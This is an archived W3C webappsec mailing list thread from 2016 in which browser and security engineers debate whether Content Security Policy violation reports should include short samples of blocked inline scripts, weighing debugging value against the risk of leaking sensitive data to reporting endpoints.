Re: CSP reports: `script-sample` from Brad Hill on 2016-10-19 (public-webappsec@w3.org from October 2016)

From: Brad Hill <hillbrad@gmail.com>
Date: Wed, 19 Oct 2016 17:14:35 +0000
To: Craig Francis <craig.francis@gmail.com>, Krzysztof Kotowicz <kkotowicz@gmail.com>
Cc: Artur Janc <aaj@google.com>, Mike West <mkwst@google.com>, Devdatta Akhawe <dev.akhawe@gmail.com>, "public-webappsec@w3.org" <public-webappsec@w3.org>, Christoph Kerschbaumer <ckerschbaumer@mozilla.com>, Frederik Braun <fbraun@mozilla.com>, Scott Helme <scotthelme@hotmail.com>, Lukas Weichselbaum <lwe@google.com>, Michele Spagnuolo <mikispag@google.com>, Jochen Eisinger <eisinger@google.com>
Message-ID: <CAEeYn8gZfUcrjD3S4O01xWrFAtcsq-EUe_dF--FYSBv=BkRCVw@mail.gmail.com>
Just to add my comment after discussion on today's teleconference:

I'm sympathetic to the argument that "you must trust your reporting
endpoint" for inline scripts and event handlers.

I'm concerned about it for non-same origin external scripts.  There are
lots of "guarded" JSONP like endpoints that I imagine have PII in the first
40 chars, e.g., something like the following where u is a userid:

for(;;);{u:21482823,  ...

Allowing any cross-origin endpoint to request this response and dump it to
a reporting endpoint of their choice would be very bad.

-Brad

On Wed, Oct 19, 2016 at 8:21 AM Craig Francis <craig.francis@gmail.com>
wrote:

> On 19 Oct 2016, at 15:34, Krzysztof Kotowicz <kkotowicz@gmail.com> wrote:
>
> URLs should not contain sensitive data, precisely because they are often
> relayed to third parties
>
>
>
> Hi Krzysztof,
>
> While I agree, the classic example is a password reset.
>
> As in, a link is sent to the user via email, and that link contains a
> sensitive token that allows someone to change the account password.
>
> That said, the token should not last long to deduce the risk of it being
> exposed to 3rd parties (e.g. expiring it after use, or a certain period of
> time).
>
> Craig
>
>
>
>
>
>
> On 19 Oct 2016, at 15:34, Krzysztof Kotowicz <kkotowicz@gmail.com> wrote:
>
>
>
> 2016-10-19 2:16 GMT+02:00 Artur Janc <aaj@google.com>:
>
> On Tue, Oct 18, 2016 at 10:05 AM, Mike West <mkwst@google.com> wrote:
>
> On Tue, Oct 18, 2016 at 1:03 AM, Artur Janc <aaj@google.com> wrote:
>
> On Mon, Oct 17, 2016 at 7:15 PM, Devdatta Akhawe <dev.akhawe@gmail.com>
> wrote:
>
> Hey
>
> In the case of a third-party script having an error, what are example
> leaks you are worried about?
>
>
> The same kinds of issues that lead us to sanitize script errors for things
> loaded as CORS cross-origin scripts:
> https://html.spec.whatwg.org/#muted-errors. If the resource hasn't
> opted-in to being same-origin with you, script errors leak data you
> wouldn't otherwise have access to.
>
>
> Thanks for the summary, Mike! It's a good overview of the issue, but I'd
> like to expand on the reasoning for why including the prefix of an inline
> script doesn't sound particularly scary to me.
>
>
> Thanks for fleshing out the counterpoints, Artur!
>
>
> Basically, in order for this to be a concern, all of the following
> conditions need to be met:
>
> 1. The application has to use untrusted report collection infrastructure.
> If that is the case, the application is already leaking sensitive data from
> page/referrer URLs to its collector.
>
>
> "trusted" to receive URLs doesn't seem to directly equate to "trusted" to
> store sensitive data. If you're sure that you don't have sensitive data on
> your pages, great. But you were also presumably "sure" that you didn't have
> inline script on your pages, right? :)
>
>
> Keep in mind that URLs are sensitive data for most applications and they
> are currently being sent in violation reports.
>
>
> URLs should not contain sensitive data, precisely because they are often
> relayed to third parties in e.g. referrer. If they do, that's usually
> considered a vulnerability by e.g. OWASP, especially if the URL is
> capability bearing (IDOR
> <https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References>
> is even in OWASP Top 10). I agree that some applications disclose sensitive
> information in URLs, but that's should not be the majority of them. I think
> that for a lot of applications URLs reported through e.g. CSP violation
> reports are still subject to regular access control, whereas we just don't
> know yet if sensitive tokens are not included in script samples. It's
> likely some IDs are present in the inline scripts <a href=#
> oncllick=a.select(123)>
>
>
> I'm having a difficult time imagining a case where an application is okay
> with disclosing their URLs to a third-party for the purpose of debugging
> violation reports, and is not okay with disclosing script prefixes for the
> same purpose, given that:
> 1) Almost all applications have sensitive data in URLs, compared to a
> certainly real, but less specific risk of having inline scripts with
> sensitive data in its prefix, assuming it's limited to a reasonable length.
>
>
> Citation needed (for the "almost all" claim). I agree the risk of leaking
> sensitive date might be mitigated by adding a reasonable length limit.
>
>
> 2) URLs are disclosed much more frequently than script samples would be,
> because they are sent with every report (not just "inline" script-src
> violations). In the `referrer` field, the UA is also sending a URL of
> another, unrelated page, increasing the likelihood that sensitive data will
> appear in the report.
>
>
> Which is why it's a best practice not to have sensitive data in URLs, but
> instead e.g. using cookies or POST parameters to transfer them.
>
>
> 3) There is no sanitization of URL parameters in violation reports,
> compared to the prefixing logic we're considering for script samples.
>
>
> In fact, I'd be much more worried about URLs than script prefixes, because
> URLs leak on *any* violation (not just for script-src) and URLs frequently
> contain PII or authorization/capability-bearing tokens e.g for password
> reset functionality.
>
>
> We've talked a bit about URL leakage in
> https://github.com/w3c/webappsec-csp/issues/111. I recall that Emily was
> reluctant to apply referrer policy to the page's URL vis a vis the
> reporting endpoint, but I still think it might make sense.
>
>
> 2. The application needs to have a script which includes sensitive user
> data somewhere in the first N characters. FWIW in our small-scale analysis
> of a few hundred thousand reports we saw ~300 inline script samples sent
> by Firefox (with N=40) and haven't found sensitive tokens in any of the
> snippets.
>
>
> Yup. I'm reluctant to draw too many conclusions from that data, given the
> pretty homogeneous character of the sites we're currently applying CSP to
> at Google, but I agree with your characterization of the data.
>
> Scott might have more data from a wider sampling of sites, written by a
> wider variety of engineering teams (though it's not clear that the terms of
> that site would allow any analysis of the data).
>
>
> I completely agree, this data is just what we had readily available -- we
> can certainly do a much larger analysis of script prefixes based on the
> search index. That said, if we're worried about the script-sample approach,
> perhaps not seeing any sensitive data in the first dataset we looked at
> could be a signal that it's worth pursuing further.
>
> 3. The offending script needs to cause a CSP violation, i.e. not have a
> valid nonce, meaning that the application is likely broken if the policy is
> in enforcing mode.
>
>
> 1. Report mode exists.
>
> 2. Embedded enforcement might make it more likely that XSS on a site could
> cause policy to be inadvertantly applied to itself or its dependencies. We
> talked about this briefly last week, and I filed
> https://github.com/w3c/webappsec-csp/issues/126 to ponder it. :)
>
>
> Since CSPs applied by embedded enforcement serve a very different purpose
> than current policies (they don't try to mitigate script injection), it
> would very likely be okay to just not include script-sample data for such
> policies. Also, embedded enforcement is still pretty far off, and the
> reporting problem is an issue for pretty much every site currently
> gathering violation reports; we should probably weigh the value of fixing
> CSP reporting accordingly.
>
>
> As a security engineer, I would consider #1 to be the real security
> boundary -- a developer should use a CSP collector she trusts because
> otherwise, even without script-sample, reports contain data that can
> compromise the application.
>
>
> That sounds like an argument for reducing the amount of data in reports,
> not for increasing it. I think it's somewhat rational to believe that
> reporting endpoints are going to have longer retention times and laxer
> retention policies than application databases. Data leaking from the latter
> into the former seems like a real risk. I agree that the URL itself already
> presents risks, but I don't understand how that's a justification for
> accepting more risk.
>
>
> It is an argument for using trusted infrastructure when building your
> application ;-) Developers are already accustomed to deciding whether to
> place trust in various components of their apps, whether it's the hosting
> platform and OS, server-side modules and libraries, or JS widgets and other
> embedded resources. A CSP violation endpoint is currently a
> security-critical part of an application because it receives URLs; people
> who don't trust their collection infrastructure already have insecure
> applications and adding script-sample to reports does little to change
> this. (Note that this wouldn't hold for applications which have nothing
> sensitive in URLs and embed sensitive data at the beginning of inline
> scripts, but this doesn't seem like a common pattern.)
>
> Basically, the reluctance to include relevant debugging information in the
> violation report seems to be somewhat of a misplaced concern to me, because
> it ignores the trust relationship the application owner must already have
> with their report collection endpoint.
>
> Perhaps it's pertinent to take a step back and think about the reason to
> have reporting functionality in CSP in the first place -- after all, the
> mechanism could certainly work only via throwing SecurityPolicyViolation
> events and requiring developers to write their own logging code. The fact
> that this capability exists in UAs, and is not restricted to sending
> reports to the same origin or same "base domain" (contrary to the original
> proposals, e.g. in http://research.sidstamm.com/papers/csp-www2010.pdf)
> indicates that CSP wants to be flexible and give developers ultimate
> control over the reporting functionality. Given this design choice, it
> seems okay to trust the developer to pick the right report URI for their
> application and include useful debugging data if the developer wants it; in
> a way, the status quo is the worst of both worlds, because it already
> requires the developer to fully trust the collector, but doesn't give her
> enough useful data to track down causes of violations.
>
> In case it helps: Lukas ran a quick analysis of the report-uri values
> we've seen in the wild, and e.g. for the domains with CSP in Alexa 100,000
> we see the following:
> - 49% don't set a report-uri
> - 29% have a report-uri pointing to a relative path (/foo)
> - 10% have a report-uri pointing to the same origin, with another 1% using
> a sibling subdomain (foo.example.org reporting to csp.example.org)
>
> Out of the remaining ~10% which send violations to external URLs, about
> half point to report-uri.io and a couple of other logging services, and
> the rest seems to use another domain owned by the same person/organization,
> e.g. vine.co sends reports to twitter.com. The data for all domains in
> our set isn't substantially different (66% without report-uri; 24%
> reporting to own domain; 10% externally). This data doesn't include all the
> Google ccTLDs and a couple of other big providers, and I'm sure it's
> missing some other domains, e.g. ones with CSP in parts of the site
> requiring authentication, but AFAIK it shouldn't have a systematic bias
> otherwise.
>
> I can easily imagine scripts that violate conditions #2 and #3, but at the
> same time we have not seen many examples of such scripts so far, nor have
> people complained about the script-sample data already being included by
> Firefox (AFAIK).
>
>
> People are generally unlikely to complain about getting more data,
> especially when the data's helpful and valuable. That can justify pretty
> much anything, though: lots of people think CORS is pretty restrictive, for
> instance, and probably wouldn't be sad if we relaxed it in various ways.
>
>
> Overall, I don't see the gathering of script samples as qualitatively
> different to the collection of URLs. However, if we are indeed particularly
> worried about script snippets, we could make this opt-in and enable the
> functionality only in the presence of a new keyword (report-uri /foo
> 'report-script-samples') and add warnings in the spec to explain the
> pitfalls. This way even if I'm wrong about all of the above we would not
> expose any data from existing applications.
>
>
> I suspect that such an option would simply be copy-pased into new
> policies, but yes, it seems like a reasonable approach.
>
>
> For some background about why we're even talking about this: currently
> violation reports are all but useless for both debugging and detection of
> the exploitation of XSS due to the noise generated by browser extensions.
>
>
> I agree that this is a problem that we should solve. One way of solving it
> is to add data to the reports. Another is to invest more in cleaning up the
> reports that you get so that there's less noise. I wish browser vendors
> (including Chrome) spent more time on the latter, as we're actively harming
> users by not doing so.
>
>
> Yes, fixing the blocking and reporting of extension-injected scripts would
> certainly help (although note that "less noise" likely isn't sufficient, it
> really has to be zero noise), but IIRC prior discussions we've had about
> the topic indicated that this is an almost intractable problem, so it would
> be great to find alternative solutions.
>
> The script sample approach also has several important advantages because
> even without extension-related false positives, developers would have very
> little information about the actual cause of inline script violations
> (which are the majority of possible CSP problems in nonce-based policies).
> Sending some of the script text not only makes it possible to discard all
> spurious reports, but also gives the developer the crucial bit of data to
> find and fix actual site errors; it seems like a workable solution to the
> current reporting problems faced by many sites.
>
> Cheers,
> -Artur
>
>
>
>
> --
> Best regards,
> Krzysztof Kotowicz
>
>
>
Received on Wednesday, 19 October 2016 17:15:18 UTC